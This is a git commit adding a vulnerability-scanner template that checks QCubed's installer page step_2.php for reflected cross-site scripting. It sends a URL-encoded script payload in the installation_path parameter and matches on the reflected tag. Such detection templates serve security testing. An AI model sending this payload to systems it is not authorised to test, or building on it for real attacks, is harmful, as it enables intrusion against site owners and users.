Create qcubed-xss.yaml

patch-1
PikPikcU 2021-07-27 13:06:30 +07:00 committed by GitHub
parent e2aed1ac36
commit a2fc63b7ac
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 30 additions and 0 deletions

View File

@ -0,0 +1,30 @@
id: qcubed-xss
info:
name: Qcubed Reflected XSS
author: pikpikcu
severity: medium
reference: https://github.com/qcubed/qcubed/issues/1230
tags: xss,qcubed
requests:
- method: GET
path:
- "{{BaseURL}}/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3Cscript%3Ealert(document.domain)%3B%3C/script%3E%3C%22"
- "{{BaseURL}}/qcubed/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3Cscript%3Ealert(document.domain)%3B%3C/script%3E%3C%22"
matchers-condition: and
matchers:
- type: word
words:
- '<script>alert(document.domain);</script>'
part: body
- type: status
status:
- 200
- type: word
part: header
words:
- text/html